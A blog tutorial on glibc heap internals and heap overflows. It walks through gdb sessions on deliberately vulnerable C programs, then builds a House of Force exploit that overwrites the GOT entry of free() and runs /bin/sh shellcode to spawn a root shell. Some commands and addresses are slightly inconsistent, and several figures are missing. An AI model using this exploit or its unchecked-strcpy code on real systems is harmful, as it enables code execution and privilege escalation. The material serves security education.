Malloc me the wrong way, and I'll crash your heap!

9 minute read Published:

Malloc me the wrong way, and I'll crash your heap!

Blog Post by Aladdin Mubaied

I always get fascinated by the dynamic memory allocation in modern operating systems. it’s quite interesting to understand the different components involved in handling special requirements such as space allocation, portability, memory fragmentation, error detection and so on. Dynamic memory allocation was created mainly to solve the problem of allocating memory while the program is running as opposed to telling the program how much memory required ahead of time.

Many programming languages handle the memory allocation using special routines called “memory allocators”, and what they do is they allocate memory from the free store, informally called the “heap” (it’s an area in memory structured for this purpose). In C, if you want to allocate a large amount of memory, you can use one of these functions, malloc(), realloc(), or calloc(). You will also use free() to release the allocated memory. The GNU C library including most versions of Linux are based on Doug Lea’s malloc (dlmalloc) implementation. malloc() function in glibc obtains memory from the operating system using either brk() or mmap() syscall function.

Now let’s take a look at this basic program in C to better understand the heap allocation.

If you don’t know the difference between calloc() and malloc, calloc() by default fills up the allocated memory with zeros. To verify this, Let’s compile and run the program in gdb:

 (gdb) ./heap_example 

Let’s now setup a breakpoint before strcpy() function, run it and examine the memory:

code image

As you can see, our “alloc” address does not contain anything at this moment, which means our allocation has not happened yet. Let’s hit next instruction and monitor the allocation address for “alloc”. code image

All zeros!! Yes, you’re correct, We have successfully allocated the memory on the heap. Ok now let’s hit continue and exit the program. As this point, we have not yet talked about the problem of all these heap allocations. A while ago, many programmers believed that allocations on the heap are just safe, by allocating a specific region in the memory called “chunks” and copy our data to it seems just fine. In fact, if our copied data exceeds the size of allocated memory we will have a flaw known as heap overflow. heap-based overflow is actually as dangerous as its counterpart stack overflow if those allocations were not properly managed.

Overflowing the heap

To understand the concept, let’s run our program but this time with some random input larger than our buffer and setup a breakpoint before strcpy().

 (gdb) r `python -c "print 'A'*250"`
Starting program: ./heap_example `python -c "print 'A'*250"`

Breakpoint 1, main (argc=2, argv=0xffffd654) at heap_example.c:8  
8 strcpy(alloc, argv[1]); 

As you can see, we hit the breakpoint on strcpy(). Let’s now examine the memory for “alloc”, since we did not step the instruction of strcpy() yet, we are expecting to see all zeros:

 (gdb) x/250xb alloc

0x804b008: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00  
0x804b010: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00  
0x804b018: 0x00 0x00 0x00 …  

Now let’s go to the next instruction and monitor our heap allocation for the first 200 bytes :

code image

And as exactly expected, we filled our heap with a bunch of 0x41 which represents A’s in ASCII .

Now as you may have noticed from the code above, we have allocated 200 bytes in the memory but we gave our program an input larger than 200. Let’s hit continue and see what’s gonna happen?

 (gdb) continue
*** Error in ./heap_example: free(): invalid next size (normal): 0x0804b008 ***
Program received signal SIGABRT, Aborted.  

We just received an “Aborted” message or SIGABRT along with an obvious error of free(): invalid next size. But why? What just happened! Well, let’s illustrate the heap a little bit before we explain why.

Heap chunks

The heap contains a linked list of used and free blocks, whenever the memory requests a new buffer, top chunk (which represents the remaining available memory on heap) splits in two, one for the requested buffer, and the other for the top chunk which is now smaller in size. If the top chunk is not large enough, the program will talk to the operating system to expand the top chunk (This is generally how the heap grow in size).

When the buffer in use, it will hold the previous chunk size and the actual chunk size followed by flags which contain stats on the current chunk, for example, the value 0x01 represents “PREV_INUSE” which gets set when the previous chunk is in use. Also “IS_MMAPPED” and “NON_MAIN_ARENA” flags.

 unsigned int * buffer = NULL;  
buffer = malloc(0x100);  

Further, when the buffer is in freed state, it will receive two pointers, forward pointer which points to the next freed chunk, and the backward pointer which points to the previously freed chunk.

Ok, a lot of details, now let’s go back to the question we asked before, why we crashed the program with the error message “free()”. To answer this question, we know that the heap memory grows towards higher memory address versus stack which grows towards lower memory address. Also, written strings in heap grow in the same direction. When we ran the program with 250 bytes, we caused the buffer to flow to the adjacent heap chunk in the memory, where previous chunk size was overwritten with our large string. So when we called free(alloc); the free call sees the data following your chunk as invalid, thus throwing the error message above.

code image

Exploitation

Lets now focus on exploiting this memory flaw. If you recall in the stack based overflow, controlling the program execution can be done by controlling EIP. however, this technique does not apply to the heap overflow. So we need to think about a different approach.

One of the methods to achieve code execution requires that we control the top chunk (last remaining heap space), we don’t want accidentally to malloc() objects that are in the middle of the heap, so we need to use heap fill function tool to fill in all the gaps and defragment the heap, this way we know that the new object that we create is going to be at the end of the heap “House of Force”. If you looked closely at the _int_malloc function, what we want to do is to overwrite av->top which always points to the top chunk with our controlled data, we need to do this because we know if we can force a call to malloc() which uses the actual top chunk, we can control where the next chunk will be allocated on the heap. This way we can write our arbitrary data and control the return value of malloc. Our payload should fill the allocated buffer, then 4 bytes to prev_size, and then overwrite the size with the largest possible (unsigned) integer.

Good stuff! Now let’s see an example and explain how can we write an exploit for it.

 
#include <stdio.h>
#include <string.h>
#include <stdlib.h>

int main(int argc, char *argv[])  
{
    char *buf1, *buf2, *buf3;
    if (argc != 4) return;

    buf1 = malloc(256);
    strcpy(buf1, argv[1]);

    buf2 = malloc(strtoul(argv[2], NULL, 16));

    buf3 = malloc(256);
    strcpy(buf3, argv[3]);

    free(buf3);
    free(buf2);
    free(buf1);

    return 0;
} 

To create an exploit for the above program let’s first compile it, run it in gdb with specific inputs to make sure we can control the top chunk. Let’s first break after buf1 and calculate the top chunk.

 (gdb) r $(python -c 'print "A"x260 + "\xFF\xFF\xFF\xFF"') 2 3
Breakpoint 1, main (argc=4, argv=0xffffd714) at heap.c:11  

Now let’s first check where the chunk of 256 bytes has been allocated. And verify that we have replaced the top chunk with our arbitrary address .

 (gdb) p buf1
0x804b008  
(gdb) x/264xb buf1
0x804b108: 0x41 0x41 0x41 0x41 0xff 0xff 0xff 0xff 

Yes our buffer now contains the 0x41 covering the first 256 bytes and 4 bytes overwriting the prev_size and the last 4 bytes replaced the size with our large value.

Next we need to calculate where the top chunk starts at. The formula is simple, you need to calculate the size of the allocated buffer adding 4 bytes to it and then calculate that from the address we have included in the previous step. Based on our calculation we have the address as 0x804b10c. Cool so now we know that our top chunk starts at this address. What we will do next is use the first allocation buf1 to copy our shellcode and replace the size with large address value, buf2 for our large allocation, the reason we need a large allocation here is because we want our new top chunk to be located just 8 bytes before the GOT entry of free, and then finally buf3 to point back to our buf1 (overwrite GOT entry of free). However, there is a gotcha here, our goal is to overwrite the pointer to free() function and the way to do that is by simply replacing the GOT address of free in our program. If you are unfamiliar with GOT entries go and read about relocations .

To get the address of free in GOT you can simply do the following:

 $ readelf -r heap | grep free 
08049958  00000207 R_386_JUMP_SLOT   00000000   free 

We got the address of free in GOT as 08049958. We want to subtract 0x8 from the address so we get 0x8049950. Now we have all the variables to build our shellcode, we just have one thing left, which is the size for our second malloc() allocation. It can be calculated based on the following formula : size = ((free-8)-top) . Since we have the address for our top chunk and the address of free() in GOT, the size value will be 0xfffff843. Ok now let’s create the full payload and run the exploit.

 $ export param1=$(python -c "print '\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80' + 'A'*235 + '\xFF\xFF\xFF\xFF'")
$ export param2=$(python -c "print '0xFFFFF843'")
$ export param3=$(python -c "print '\x08\xa0\x04\x08' + '\0'") 
 $ ./heap $param1 $param2 $param3
sh-4.2# id  
uid=0(root) gid=0(root) groups=0(root),1(bin),10(wheel) 

BOOM! As expected we spawned a shell!

Conclusion

Exploiting heap buffer overflow is not as straightforward as stack based overflow. It requires a lot of in-depth knowledge into the heap malloc() implementation. Our exploit above is based on how dlmalloc() allocates and frees heap memory segments. Different kind of heap flaws requires different methods of exploitation, for example, use-after-free bugs require a multi-stage payload in order to deliver a working exploit. Notably, the toughest to exploit are use-after-free bugs in the context of the browser which requires techniques such as heap spray, and memory leaks to bypass modern protections such as ASLR and isolated heap.